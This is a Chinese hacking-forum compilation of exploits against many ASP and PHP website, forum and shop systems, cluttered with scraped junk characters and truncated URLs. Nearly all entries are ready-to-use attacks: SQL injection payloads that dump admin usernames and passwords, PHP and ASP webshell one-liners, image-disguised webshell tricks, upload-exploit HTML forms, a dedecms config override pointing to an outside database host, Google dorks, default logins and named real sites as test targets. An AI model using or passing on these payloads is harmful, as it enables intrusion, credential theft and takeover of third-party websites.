启航企业建站系统 cookie注入漏洞通杀所有版本' ?& U' c1 s* w: ?
- u/ L) W4 s& x1 ]1 O
直接上exploit:
6 G1 m$ N: d4 Ejavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
2 x1 C% ] Z0 X4 a/ Otest:http://www.tb11.net/system/xitong/shownews.asp?id=2104 Q2 Q3 t) H, l+ v4 M0 q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, w/ c/ q+ n" E1 n1 `& r) U! vAsprain论坛 注册用户 上传图片就可拿到webshell
7 m( l- ?6 Z3 c* n
1 O& d0 M+ f& g* o6 d3 qAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
% P$ w" ]& u- ^# I2 @1.txt存放你的一句话马 如:<%execute(request("cmd"))%>) E$ y% o. V5 |& C Y: ~
2.gif 为一小图片文件,一定要小,比如qq表情图片
9 X5 P( w) K9 ?2 ~3 [3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
( q8 A* h$ u, Z+ P- R$ Y- X4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
/ m! ~- H* e4 ~9 |5.q.asp;.gif
4 G3 e9 @( L% y" a8 Qgoogle:Powered by Asprain: T2 O' A1 g1 [6 z b6 v
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& [4 s/ J b: B/ w9 v) K9 W C
+ k7 @: x: T7 \7 g) A$ KShopNum1全部系统存在上传漏洞。
8 D/ h/ r: f# S) Z: l) D( |0 ?
* t: `3 \7 W" W. A首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。& ?8 \! ~1 H' n' `* D( B3 H
按说明 提示登录后台。。1 k, A# l$ l+ Z' W
在后台功能页面->附件管理->附件列表
9 P4 |! W+ B$ _可以直接上传.aspx 后缀木马* |+ v, `5 v) `6 _/ n
http://demo.shopnum1.com/upload/20110720083822500.aspx
j3 ^( a0 e5 v( D }* i1 o/ X--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 ]3 S7 M! z4 h" T4 m+ U% q
+ k; V5 m" P- P. R! v$ R" t牛牛CMS中小企业网站管理系统 上传漏洞
' A, U0 f4 P) G% @7 ?( P& c) Z
, t; Z$ s9 W0 f9 y/ K$ H牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。; \$ Y: l; ~; p- m3 }) ]; L
后台:admin/login.asp
) Q/ j" z/ O) y! y' Cewebeditor 5.5 Nday. @( e' i _" }. e8 }
exp:7 M3 f# [' g1 F8 G. y
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
1 q& N1 S- i& c+ i( ^0 q<input?type=file?name=uploadfile?size=100><br><br>?* `" r6 q% s* t* N
<input?type=submit?value=upload>?
7 Y- l/ m" N# C. p9 n- x% R. E</form>
, n4 l+ o! Z E$ s( |" G8 P/ ups:先上传小马., V: c g% n! f9 M
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏1 e8 p: o: n' R* C" m& N
" X, t, u! t% i- l, n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 I. q8 Y% t0 A3 e+ [7 H. L, l7 a5 h
YothCMS 遍历目录漏洞
* `! _6 m- l6 z" U2 J+ U) l
8 z8 ~3 n% |4 u( C `" L优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。/ G/ J3 ~/ \4 O; b* K) l& p
默认后台:admin/login.asp- D, F8 ^3 P7 [6 {! S
遍历目录:
3 ~9 ]$ U1 z, x! j Pewebeditor/manage/upload.asp?id=1&dir=../9 s7 o# Y L5 M/ o8 g! K' i
data:
( p& K& n% h6 X4 v' B$ Shttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
1 p; h; T; Z0 o3 F3 b8 ?' G) U4 M7 F--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 ~: U4 W4 g: N5 @" S% h
4 x$ \& L+ ]9 H! R- V9 c2 \Net112企业建站系统 1.0
/ K( @# G' H- P, W0 \7 e5 b2 ?9 c4 i+ u2 q
源码简介:
- g( ^ Y3 _/ |: r6 w% A- |0 pNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
! k+ j8 `8 {& ]& L1 z- \添加管理员:
n5 x9 `; S( Whttp://www.0855.tv/admin/admin.asp?action=add&level=2
2 _: B& E2 g% f# s1 \其实加不加都不是很重要,后台文件都没怎么作验证。) ]9 F7 {2 Q" `( o7 y) j
上传路径:/ G2 h4 q$ @. D8 l8 w
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
3 G5 ~6 `; x5 Whttp://www.0855.tv/inc/Upfile.asp?Stype=2
" u8 b# e' f$ x$ Q0 i; }, c# b) J怎么利用自己研究。: ]; V- x1 z) U( u' r7 U
遍历目录:
s3 [6 H9 ?, ^/ P9 hhttp://www.0855.tv/admin/upfile.asp?path=../... T! G5 H5 R$ u/ f. m( w: K
如:& Q X/ a5 j& g ^( Q2 P- [& i
http://www.0855.tv/admin/upfile.asp?path=../admin
6 x, L5 W: d* [: rhttp://www.0855.tv/admin/upfile.asp?path=../data/ V/ C. S. q) y9 U' H
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ F+ e- {, J/ Y
3 a, n. M$ T4 [易和阳光购物商城通杀 上传漏洞# x- J6 K4 ~ Q( Y! g
- _. K3 u. ^; p- g( I$ S前提要求是IIS6.0+asp坏境。
( O; H$ s3 ~6 w& N3 p8 J4 P" J漏洞文件Iheeo_upfile.asp
) k* E7 n1 p1 w2 |过滤不严.直接可以iis6.0上传
8 J/ [; K; d! N' H/ P把ASP木马改成0855.asp;1.gif! G4 o) s8 n! q0 a
直接放到明小子上传
' H/ [. E) O& t4 p, W, yGoogle搜索:inurl:product.asp?Iheeoid=- n7 `+ V! y8 X1 W9 A2 `' c7 l
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 ~5 e/ s/ Y2 o8 b, E$ C) r
- J$ S% d3 `( K, W0 l( ~phpmyadmin后台4种拿shell方法) b1 ~' p1 C/ ?
. T" ?* B0 S6 |! F; Y
方法一:) @3 e3 o4 U( E: F
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
1 F! [- o/ A8 V) sINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');: `, s1 Q/ t d' N6 I
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';5 J7 {& v) w! c% l
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php9 j, {5 _# F( K" E% p5 r# b! g
一句话连接密码:xiaoma3 c# W* ?3 R0 {6 y7 x# n
方法二:
0 w- A6 x8 j$ g! i9 d: z) {& `, j5 vCreate TABLE xiaoma (xiaoma1 text NOT NULL);
5 X* A) V6 ?# ?# d0 N5 oInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');- h9 w# Z, `7 L$ H5 ~& Q8 \: k
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
1 T- N. ? b, b/ NDrop TABLE IF EXISTS xiaoma;3 ?* b1 d6 O2 _2 A1 H$ z
方法三:" H* Q$ Z$ t: T: U" \* I) R, S
读取文件内容: select load_file('E:/xamp/www/s.php');7 q8 k& ^% S5 e
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php') |6 b! V0 ]; P% G# W" p: {( r1 v
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
0 [$ U- [) T9 [. P; ? |方法四:
; y3 D8 f. G, Q# ^1 ]! Dselect load_file('E:/xamp/www/xiaoma.php');$ E# k# J) T% U# s/ M( i
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'2 @4 s) k" n# v/ Z
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir1 q. |8 @( m: T1 _* _! ]
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ w- f- H O& b: T# y6 x% T7 E5 H4 ]+ R) W) \7 s
传信网络独立开发网站源码0day漏洞
; L# @ e" A. \6 t7 } V; y7 d+ _- V8 E: M- C% K
后台system/login.asp0 I/ V; [& ~/ S+ F
进了后台有个ewebeditor
: K1 [; w! U4 AGoogle 搜索inurl:product1.asp?tyc=
7 r- F7 w. m: e. R编辑器漏洞默认后台ubbcode/admin_login.asp
- l& z- G8 n4 m" w" p! B1 S j3 ?数据库ubbcode/db/ewebeditor.mdb2 `; B% ]; ~1 q1 c6 N
默认账号密码yzm 111111/ F6 ]/ H9 X D
* {4 d/ @2 t6 ?* [$ n7 {: p$ l5 H0 _
拿webshell方法
9 y2 N6 N. n+ |登陆后台点击“样式管理”-选择新增样式
* @" X3 B$ x% F样式名称:scriptkiddies 随便写 8 j. R2 G! {' o: l/ p. Q
路径模式:选择绝对路径 : }1 n6 [( n# D$ o- k# {% l. D7 @
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx2 Q( F( p- O; s6 n- K( |$ ], C) h
图片类型比如就是我们要上传的ASP木马格式
! C. d3 d+ s. w上传路径:/& Z" M, i& D; c9 j- w8 P
图片限制:写上1000 免的上不了我们的asp木马
* k& p2 \* _2 j$ h' k0 B上传内容不要写( r$ N# _' u" U7 `/ l/ J: K7 u4 k7 X
可以提交了
4 S9 L- Y0 \( F+ L样式增加成功! 0 Z& h/ ^8 T+ `$ z6 v7 {
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
+ r( v+ N; F% H+ e按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置: R0 R: e0 A5 _$ F
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
9 T2 G2 ^8 {# ]; n" y/ E) R上ASP木马 回车 等到路径
: I i, _" i( o
# Z& j# ~) h: b& b1 e后台:system/login.asp3 S+ A/ u) A+ Y4 @) Q- P
Exp:
% N ]! f: R7 Y( n% }9 w4 mand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
; C- ~" G# W8 Z3 y3 j3 D7 V. H测试:* }, B2 }8 w9 j) ]: X5 P
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
+ [& B( k+ ~" Z) q4 w# s. _http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master& z9 m! l8 A( g; q6 G5 B2 E" x
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; r6 U+ c% A7 D
% R9 W) C2 J- o) kfoosun 0day 最新注入漏洞0 |2 w! L) ]8 B% J5 ~4 K
. [! n, S% @* m( r' I' Q漏洞文件:www.xxx.com/user/SetNextOptions.asp
# E% y4 X! i- z* M利用简单的方法:
0 {7 l/ ~7 l# l5 ]暴管理员帐号:% I$ d' e6 h; W8 G; l4 ~, v) N/ {. @
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin# c1 \! R6 h" Z* `
暴管理员密码:+ r8 o7 M: I5 W: F
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,: o0 C9 u% A( F: ?- S! w2 {9 i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 H' b! a; s3 |7 O
6 z5 ~+ W. z$ E$ n8 W网站程序的版权未知!
, i1 o7 l r! z: ]/ ~+ x) Q9 s. r w9 u' A0 V0 w% V( P+ y h
默认网站数据库:
8 z- M+ Z5 B" vwww.i0day.com/data/nxnews.mdb
# b1 j5 w$ J+ [! Wewebeditor 在线编辑器:
3 c1 M9 } {5 o" F+ G3 |编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb0 L: `) [2 s6 x5 `1 g
登录地址:ewebeditor/admin_login.asp
2 {' P" ^& a j& Y) i! g默认密码:admin admin6 @) N% E9 \, H2 d ] ~, C$ L: f2 P7 q
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
Q% v, ^9 t6 s7 I+ e4 p7 {/ R8 _" {. L: f4 i) x1 o
Sql注入漏洞:
9 p7 L, w9 z# D9 Xhttp://www.i0day.com/detail.asp?id=12
) X) f* N$ O; b+ Z/ ]# Vexp:
: Q- j+ U; ]( R5 P, Funion select 1,admin,password,4,5,6,7,8 from admin4 n1 K5 @% _' F: h
爆出明文帐号/密码
5 z" j) N7 u% e+ ^' p9 Q5 u8 ~. P4 A" [8 m; U" _
上传漏洞:
D, s$ q& V; |( }5 L后台+upfile.asp
. A8 w9 ?! o* |! G" e如:+ h! @" Q7 @, | E
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
2 w$ e! d: J, p6 Hshell的地址:网址+后台+成功上传的马
# B( B% e! m8 Q# a4 y7 J0 dgoogle:inurl:news.asp?lanmuName=
( E2 ?" H% e2 g" j' P$ {------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 t/ D) b$ K5 s# n% R; R
8 J- G7 U5 T8 m8 ~dedecms最新0day利用不进后台直接拿WEBSHELL
? l1 U& C" \
( y6 P `4 s* z) p0 X拿webshell的方法如下:
, r% f ?+ u/ G4 V h, `网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
8 Z" ]: p6 J- j6 b6 D前题条件,必须准备好自己的dede数据库,然后插入数据: J+ i9 l" r( O( a/ q" w
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); * Z# T9 q9 M% ~
# i% J/ a/ d1 r- p, A) @
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
- z; H. f+ b7 o<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
~+ y2 y# l7 E Q4 `<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />3 l! _( M- D; [8 M
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
. M& x4 v$ s! i% @, z4 @3 @<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />7 m( G$ a0 b# Y3 y" ]* Y# @' T0 o
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />/ @" w" Z( V1 T; b
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
T; p0 r3 t: g$ e5 M/ h1 ~5 D( k<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
+ v$ @ }7 w5 n! _2 D5 o# d" B% N<input type="text" value="true" name="nocache" style="width:400">, H, k7 a5 i/ c' C
<input type="submit" value="提交" name="QuickSearchBtn"><br />
1 a S- W: U# _( o. ]2 B4 F) Q</form>) k/ g0 l) i/ P4 w
<script>
1 y. x& j1 K9 L- |; k& s5 Afunction addaction()
# V3 o/ g) l5 W2 B/ V. u+ C{8 }! \) I" K, g4 G: g/ v) d
document.QuickSearch.action=document.QuickSearch.doaction.value;+ L7 V7 ^& C0 V! n: J1 ~( a
}# I. Z. Y# F; `5 c* w8 E) z$ i
</script>
( d) } b2 }& B) V-----------------------------------------------------------------------------------------------------------------------------------------------, O; S" g, C1 K* B/ P$ N
5 Y; V5 j8 G0 A' H7 R( _& ldedecms织梦暴最新严重0day漏洞
) D( K6 ]0 ?- p4 G/ p, R. Q; ~bug被利用步骤如下:* S7 D1 e- ^9 L: \
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
) M2 }, q! A' x- S+ i! G- r+ o5 \把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
+ f3 x4 p8 h s1 P-------------------------------------------------------------------------------------------------------------------------------------------
4 l0 Z) |1 M* [$ i8 g9 A: I- c9 ? B$ N$ i3 f8 K3 J$ V
多多淘宝客程序上传漏洞
. g5 j% v8 U4 f6 m" Q2 ^& U% V" E漏洞页面:2 }) }9 b2 V6 X3 t* P1 D! \0 s
admin\upload_pic.php! x6 I. n$ i* J# C7 ?
传送门:4 h( _$ A" o& ^; z% F6 f6 F5 i& C
http://www.www.com/admin/upload_pic.php?uploadtext=slide14 F* a( t' ~; l M4 a, d
PS:copy张图片马 直接 xxx.php 上传抓包地址!
2 T5 u4 K1 k* u5 G------------------------------------------------------------------------------------------------------------------------------------------------------- T/ ~1 k7 n" k% L3 H
) }8 q0 d; V( Z5 v, q3 v7 B+ e
无忧公司系统ASP专业版后台上传漏洞
' W$ e& D% a* P+ T4 J! A# J漏洞文件 后台上传
# R5 A2 z5 Y/ qadmin/uploadPic.asp& ~: `* U2 L0 d3 }; I
漏洞利用 这个漏洞好像是雷池的 Q; P) n- n0 R& N) w* O
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
) ^* X- { Z( }# k$ d等到的webshell路径:
) K9 ~# B: @* x. e; a/UploadFiles/scriptkiddies.asp;_2.gif
. ^; T8 }% K+ e' r---------------------------------------------------------------------------------------------------------------------------------------------------
% L0 h% E$ d7 B" _# i# [6 R
* [# z) T, A" g7 \7 o住哪酒店分销联盟系统2010- a* |' ?9 j# ]* Z, C" Z
Search:3 w0 e8 X) G4 [% T8 O# z2 O5 G6 `
inurl:index.php?m=hotelinfo
l( @, Q( K, \8 t1 _http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin9 |( c0 k, p1 u7 ~; k( @+ M# ?
默认后台:index.php?m=admin/login
( R2 t+ {$ O; ]0 \: N- R--------------------------------------------------------------------------------------------------------------------------------------------------
. P+ _ {6 \3 V5 M; J( F6 @. }; S* o
inurl:info_Print.asp?ArticleID=
0 o6 {* B3 c& \# L( s/ {后台 ad_login.asp
. R( H: S. f/ J1 a+ Z爆管理员密码:* k' \4 o6 X) P" m2 G% u/ h
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin- D$ Z# E5 y5 k0 P
------------------------------------------------------------------------------------------------------------------------------------------------------------3 o# H% | _: n3 E) p
$ g# q o; R8 D6 P! \6 b- j搜索框漏洞!
; W6 M2 k; p6 Z6 T- Y# a/ m. S3 \%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='% H, v) ?- a7 X% V( A; f; D
--------------------------------------------------------------------------------------------------------------------------------------------------------
$ b: O% F2 W6 ?2 Q/ A% p6 e0 `: _! E3 G9 e
关键字:) c0 z& I( V7 c
inurl:/reg_TemletSel.asp?step=2, v% L% x2 Z: k" ^6 L. C
或者, n8 T% i5 t8 M! f6 E" M# \/ p, b6 [
电子商务自助建站--您理想的助手
- i' a7 E$ p% k& I2 S-------------------------------------------------------------------------------------------------------------------------------------------------
% A8 L/ P! v$ y& a3 w5 e/ E
2 A0 A8 j4 l& a: l0 z7 y! IiGiveTest 2.1.0注入漏洞( |$ D1 f$ H/ N$ x8 o
Version: <= 2.1.0
3 A, J7 F' a! f3 F( g) g' T# Homepage: http://iGiveTest.com/2 U. G9 E7 ~- h3 ^( n
谷歌关键字: “Powered by iGiveTest”: o' ~* @5 E1 Y, F- Z
随便注册一个帐号。然后暴管理员帐号和密码 J- ~- T# Q2 `) I' A: u( u' F
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
, F! N d3 ]% i' E6 B$ h! N------------------------------------------------------------------------------------------------------------------------------------------------
/ g* ? u6 I) N) s* k1 B7 o6 p' a0 N: p+ Z3 @* @* Q- d. A1 }7 b9 j
CKXP网上书店注入漏洞9 T, r" J$ C6 S( X
工具加表:shop_admin 加字段:admin+ G& J# c7 E- O; {
后台:admin/login.asp
5 t: c( ~/ {% C登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/; ]' e' O4 |8 j) A
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息; j @, Z& h/ a; e7 q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 ~7 X* _) b: E# D! P# _1 A3 P; t1 ]1 a- h/ x2 s9 n, P
段富超个人网站系统留言本写马漏洞$ F0 J# f/ [1 o& _
源码下载:http://www.mycodes.net/24/2149.htm
P$ u, A' X9 U0 B1 O) o" vaddgbook.asp 提交一句话。
5 x _# g, ^1 A' U* ~连接: http://www.xxxx.tv/date/date3f.asp! o9 ]- T' b) m4 |5 k
google:为防批量,特略!+ ]* z6 Y/ R4 M7 G9 a
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 C; b8 G1 }" {* ^ H& N
' E- W, q5 l" d' H5 n
智有道专业旅游系统v1.0 注入及列目录漏洞
) y+ A. }: A3 s1 W默认后台路径:/admin/login.asp/ r5 g1 q1 e* |: H' [. M
默认管理员:admin
2 a1 ^& t# E! g. w2 c7 s9 p, V默认密码:123456
! g% Q. T- u& e% W. X: |' dSQL EXP Tset:) V4 _0 A4 q5 |1 q
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin. N0 f |! X* Y+ |
------------------------------------------------------------------------------------------------------------------------------------------------------------------------. w: {) h9 |$ [
! y9 ]) Z8 U2 aewebeditor(PHP) Ver 3.8 本任意文件上传0day6 g; Y& J( T7 Y: u' W
EXP:
* v( ?- m7 S, ~8 ?! `7 R( V<title>eWebeditoR3.8 for php任意文件上EXP</title>5 I5 m& S% I+ J
<form action="" method=post enctype="multip" t& ]# K0 e3 _- n
art/form-data"> " ?: p- _# f, |9 z' c, z5 K
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
8 W! p! M# D5 `. |8 y2 u/ uURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> * m2 g" G) f9 i( D- o7 j
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
$ v' C L3 V/ D7 Mfile:<input type=file name="uploadfile"><br> }: n( S* n$ p$ t7 [1 z
<input type=button value=submit onclick=fsubmit()>
5 @+ k* ^$ D" K$ X, {: x3 O</form><br>
' f. |. a) \/ x: `<script> ! D! C3 H6 G1 E
function fsubmit(){
& S& X9 d7 A" eform = document.forms[0];
% f4 H: r4 L I7 v8 h7 @% q# jform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
% ~ X6 w5 u/ x" k/ `; \alert(form.action);
( a" K2 Y8 p" K/ L9 U! ?! Dform.submit();
) H) a0 X# L6 e4 F4 j( u}
; o# }% {8 E! o& F</script>: C7 b& V! J) t2 L, P
注意修改里面ewebeditor的名称还有路径。
. t4 x6 U! ^* t( z---------------------------------------------------------------------------------------------------------------------------------------------------------------------------, _1 {' Z, }& Y- Q$ ]# b" t' A
+ V7 ^' A! G/ I1 R' z Q) c( r5 H
提交’时提示ip被记录 防注入系统的利用+ [7 p7 G* ?. Y$ [
网址:http://www.xxx.com/newslist.asp?id=122′( C3 t0 k, o2 V! `/ u& r0 @7 E4 G
提示“你的操作已被记录!”等信息。
: Z$ P0 p0 c& k8 [9 S" F利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。; o% e2 l) _6 X* v
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 l! A* f. q6 a
8 l+ A$ s/ u3 W) t西部商务网站管理系统 批量拿shell-0day! |& P" i9 n/ o! @- [
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
" |7 y* Z9 o$ c6 J! g% s' o1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
w" \: g7 o* r! G; o# B0 D2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
4 W( t! j! ]: k! `3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
& S) C2 h* ?- q! b) g---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! ~+ m$ D9 ]2 |1 M7 H, h, q1 z; @
8 j% A; ~, @0 I# ? d; P: T PJspRun!6.0 论坛管理后台注入漏洞
+ ~% |1 j& n9 G
% p5 G2 M+ x$ N6 ^SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
' |+ u# M7 P' {, SJspRun!6.0
1 J# ^2 q: g; G漏洞描述:1 M/ ^; e, a8 R2 k! S) d- }
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
3 H9 Q& T; B! T# W; t1 X在处理后台提交的文件中ForumManageAction.java第1940行
8 j% n; X0 ~' ], b. qString export = request.getParameter("export");//直接获取,没有安全过滤9 M3 `- M2 l2 N' h& h* h
if(export!=null){( B) N7 b1 y' \0 h+ L6 k" n
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...1 r0 p# T' a$ x( A- v, Q) l
if(styles==null||styles.size()==0){5 E1 g$ |5 W0 ~3 M: |
<*参考
5 v* ], i9 a7 F0 T7 ?$ q, }- inuanfan@gmail.com8 m1 I* u% \( _4 [( W. |
*> SEBUG安全建议:
: z; I* ?9 ?, uwww.jsprun.net# E% i) n8 N! C+ e& K, i
(1)安全过滤变量export
+ x& v/ ^6 g" u& ]6 V(2)在查询语句中使用占位符
/ C5 A7 |+ E' j# G* p------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# q# L, B. s8 }& {& {- ]( c
+ b2 e# N! y) m, v0 B8 T% m乌邦图企业网站系统 cookies 注入
; c! }: a# u* C( {+ l; ?8 U: v2 n& a! j
程序完整登陆后台:/admin/login.asp
8 _& A- ?- \' Q. h默认登陆帐号:admin 密码:admin8881 |( K! Y# \2 S! {. l3 `* ?, D% S
语句:(前面加个空格) O8 c0 Z& c& s0 c B/ H: ^4 x
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin+ i- l2 y7 A& J; ]$ v" D/ b
或者是16个字段:
& J @2 m% A5 k( V+ o' S( Uand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin6 A2 [, i7 T* u- o7 Z# n* m# q0 [: f; W
爆不出来自己猜字段。
7 `. Z6 Z: U2 [1 R注入点:http://www.untnt.com/shownews.asp?=883 n2 v% o* o& D' h, q/ L
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp, |) H& Z( U; ]$ k& d5 s- H( L
关键字:" p5 j5 r1 o! X- p- q
inurl:shownews?asp.id=3 j$ l, g% l* e/ f. w2 R
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ q; Z4 p( d0 `9 G# B8 v
2 Z- E5 j! d4 R) q, |CKXP网上书店注入漏洞- S& T- i" ^) q( [! y* Y" l. Z
7 h( ^, n D; q! Y" F) a6 Q; d5 ^* }工具加表:shop_admin 加字段:admin2 b2 O" A3 q1 G- q& c* `* ?
后台:admin/login.asp & K/ i+ r. ?9 a K |0 l3 f8 l
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
9 T/ K3 O7 `1 V2 Oinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
* i% T6 x+ n7 \7 d---------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ ]: S+ }/ l6 u: [3 @4 Y
7 ~: B" W: c: B: C8 V
YxShop易想购物商城4.7.1版本任意文件上传漏洞( @* A7 P+ P6 c* N" z( H
! Z* j, \9 s5 L& o( d, d
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
+ H1 T; J/ ?' l! u) y跳转到网站根目录上传任意文件。
% y; b6 g: M, @如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件4 f* \( L# Q, s7 _
